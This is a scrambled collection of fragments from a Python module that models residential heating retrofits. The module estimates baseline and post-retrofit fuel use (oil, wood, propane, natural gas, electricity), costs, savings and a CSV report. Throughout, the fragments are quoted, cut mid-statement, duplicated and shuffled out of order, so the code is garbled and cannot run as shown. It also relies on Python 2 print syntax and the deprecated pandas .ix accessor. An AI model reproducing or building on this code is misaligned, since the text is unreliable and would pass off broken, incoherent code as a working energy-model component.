: int Houses that can be retrofit savings_HF : float", "Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat", "\"Residential: Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\",", "self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh", ": float initial electric consumption \"\"\" rd = self.comp_specs['data'] ## total consumption total", "per yer \"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost", "HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt,", "= self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption", "propane consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption : np.array baseline total", "constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate", "Attributes ---------- capital_costs : float total cost of improvements ($) \"\"\" self.capital_costs =", "\"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\",", "Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric Heat (kWh/year)", "the total consumption Parameters ---------- fuel_amnt: float % of fuel used total_consumption :", "consumption per yer \"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def", "self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created by the project Attributes", "= range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\", "scalers Attributes ---------- run : bool True in the component runs to completion,", "+ self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0]", "= self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def", "Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas", "Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating", "financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price", "\"Residential: Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df", "self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost = \\", "self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec =", "amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted", "self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption (self):", "---------- baseline_HF_cost : np.array baseline cost of heating fuels per year \"\"\" HF_price", "(self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\", "b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential: Heating", "1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH *", "\"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\",", "($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int)", "= b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec", "!= 'residential': self.was_run = False self.reason = \"Not a residential project.\" return #", "(cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential:", "total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~ self.init_solar #~ self.init_other msg = str(round(percent_accounted)) +", "natural gas fuel consumption init_LP : float initial propane consumption init_kWh : float", "#~ self.init_solar #~ self.init_other msg = str(round(percent_accounted)) + \\ \" of residential fuel", "constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~", "consumption init_kWh : float initial electric consumption \"\"\" rd = self.comp_specs['data'] ## total", "* EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\", "self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption", "calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel costs Attributes ---------- baseline_HF_cost : np.array", "project Attributes ---------- init_HH : int estimated households for first year of project", "Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year)", "/ 100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt =", "float average electric consumption per household (kWh/year). >= 6000 \"\"\" # 500 average", "Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost", "b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost =", "Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural", "= np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords)", "= self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost -", "one in each of these function calls is an identity amnt = np.float64(rd[\"Fuel", "self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption *", "(1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by fuel from", "HF_price wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price']", "= self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price =", "init_HF : float initial heating oil consumption init_wood : float initial heating cordwood", "created by the project Attributes ---------- annual_heating_savings : np.array heating savings ($/year) \"\"\"", "/ 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords)", "== 0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate the", "s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost", "(self): \"\"\"Set columns in the the forecast to values calculated in this component", "(gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural", "self.reason = \"OK\" tag = self.cd['file id'].split('+') if len(tag) > 1 and tag[1]", "r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost", "r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost", "= self.cd['natural gas price'] else: HF_price = np.nan wood_price = np.nan elec_price =", "Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost,", "self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt =", "self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created by the", "self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption", "the the forecast to values calculated in this component \"\"\" years = range(self.start_year,self.end_year)", "\\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in the the forecast to values", "r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price", "self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other def calc_proposed_kWh_consumption", "elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas", "HF_price + \\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption * gas_price + \\", "* self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0", "Notes ----- Accepted scalers: capital costs. \"\"\" self.was_run = True self.reason = \"OK\"", "self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt =", "= self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created by", "This module estimates the potential improvements to heating efficiency of residential buildings (homes).", "avg_con = float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data is None: avg_con =", "consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption baseline_fuel_wood_consumption : np.array baseline", "produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self):", "That's where the 6000.0 # comes from. con_threshold = self.comp_specs['min kWh per household']", "rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit", "\"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\",", "Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\":", "+ \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\", "consumption for each fuel type. Attributes ---------- init_HF : float initial heating oil", "Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\",", "float savings in heating oil consumption savings_wood : float savings in heating cordwood", "\"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in", "costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel", "100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"])", ") ## % as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64(", "= area * EUI # the one in each of these function calls", "saved. Returns ------- float the total fuel saved in gallons \"\"\" base_heat =", "for electric or HF component and has a default value self.calc_avg_consumption() if self.cd[\"model", "Forecast Object aaem.diagnostics : diagnostics module, see information on Diagnostics Object \"\"\" def", "Consumption and savings are based on the number of units that have not", "self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self,", "\"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year)", "\"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural Gas", "- self.savings_mmbtu if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption = 0 # coal,solar,", "= df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() +", "constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0:", "The cost to retrofit each home is also calculated. Parameters ---------- community_data :", "(MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]", "Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year) Consumption", "electric savings created by the project Attributes ---------- annual_electric_savings : np.array electric savings", "tracking error/warning messages prerequisites : dictionary of components, optional prerequisite component data \"\"\"", "Rate of Return will all be calculated. There must be a known Heat", "(cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat", "self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption", "b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost", "price'] == 0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate", "Residential Efficiency component body ------------------------------------- \"\"\" import numpy as np from pandas import", ": float initial propane consumption init_kWh : float initial electric consumption \"\"\" rd", "residential project.\" return # needed for electric or HF component and has a", "np.array baseline cost of electricity per year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric", "= self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption *", "Avg EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption", "= float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data is None: avg_con = self.intertie_data.get_item(", "float % of fuel used total_consumption : float total consumption for residential buildings", "self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel", "12 months in a year. That's where the 6000.0 # comes from. con_threshold", "True self.reason = \"OK\" tag = self.cd['file id'].split('+') if len(tag) > 1 and", "(avg_con < con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\"", "of the project Attributes ---------- init_HH : int estimated households for first year", "s_bio_cost, \"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption", "($/year) are the difference in the base and proposed fuel costs \"\"\" self.annual_electric_savings", "Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP,", "also calculated. Parameters ---------- community_data : CommunityData CommunityData Object for a community forecast", "self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed", "\"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"]", "Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas (Mcf/year)", "* (total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption", "gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption * wood_price", "bool True in the component runs to completion, False otherwise reason : string", "#~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices =", "amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH,", "self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio =", "+ \"_output.csv\") fname = fname.replace(\" \",\"_\") # save to end of project(actual lifetime)", "Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\":", "oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP", "annual_heating_savings : np.array heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost", "\"\"\" rd = self.comp_specs['data'] ## total consumption total = rd[\"Total Consumption (MMBtu)\"] +", "prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] #~ print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self):", "consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption : np.array proposed total electric", "Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption =", "b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost =", "a residential project.\" return # needed for electric or HF component and has", "* gas_price # coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes", "price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price +", "#~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings()", "Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post", "years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def", "comp_specs : dictionary component specific data for a community. Initial value: 'Residential Buildings'", "initial heating oil consumption init_wood : float initial heating cordwood consumption init_gas :", "community_data See also -------- aaem.community_data : community data module, see information on CommunityData", "Total Savings,Annual Costs, Annual Net Benefit, NPV Benefits, NPV Costs, NPV Net Benefits,", "of fuel used total_consumption : float total consumption for residential buildings HH :", "consumption init_LP : float initial propane consumption init_kWh : float initial electric consumption", "self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel", "reason : string lists reason for failure if run == False Notes -----", "to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating", "* \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh =", "Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas", "#~ self.init_other msg = str(round(percent_accounted)) + \\ \" of residential fuel sources accounted", "(self, community_data, forecast, diag = None, prerequisites = {}): \"\"\"Class initialiser Parameters ----------", "Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val", "os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\") #", "HF_price = np.nan wood_price = np.nan elec_price = np.nan LP_price = np.nan gas_price", "Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year)", "for a community diagnostics : diagnostics, optional diagnostics for tracking error/warning messages prerequisites", "(self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year]", "get_fuel_total_saved (self): \"\"\"Get total fuel saved. Returns ------- float the total fuel saved", "float initial natural gas fuel consumption init_LP : float initial propane consumption init_kWh", "(self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption", "self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel saved.", "\"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year)", "Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year)", "= ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average", "performance improvements as a percentage of the pre-retrofit consumption, and the forecasted price", "+= amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) /", "= self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH =", "b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural", "self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val / pop)))", "\"\"\"Calculate the proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating", "self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~", "import numpy as np from pandas import DataFrame import os from aaem.components.annual_savings import", "HH : float a # of houses cf: float conversion factor Returns -------", "Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\":", "\"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the component output csv", "Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane", "for a community Attributes ---------- baseline_kWh_consumption : np.array electric consumption per yer \"\"\"", "= rd[\"Fuel Oil\"] / 100.0 HH = self.households #~ print HH area =", "not self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh", "self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost", "- self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price'] ==", "b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price", "fuel used total_consumption : float total consumption for residential buildings HH : float", "self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption", "self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory,", "amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH,", "/ 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP)", "Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating", "\"Residential: Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential:", "Attributes ---------- proposed_HF_cost : np.array proposed heating fuel cost \"\"\" HF_price = (self.diesel_prices", "\\ self.baseline_HF_consumption - self.savings_mmbtu if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption = 0", "self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) + self.start_year", "* (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh", "\\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption *", "+ \\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption", "= [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH =", "Affordable Energy Model: This module estimates the potential improvements to heating efficiency of", "self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price", "init_gas : float initial natural gas fuel consumption init_LP : float initial propane", "savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set", "consumption, and the forecasted price of offset heating fuels. The cost to retrofit", "Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year)", "not self.was_run: return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel premium'])", "premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price", "np.nan LP_price = np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF", "Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating", "Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating", "= np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH =", "object forecast : forecast community forecast for estimating future values initial value: forecast", "self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt", "\"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created by", "(gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year)", "\\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption =", "len(tag) > 1 and tag[1] != 'residential': self.was_run = False self.reason = \"Not", "construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop =", "constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = 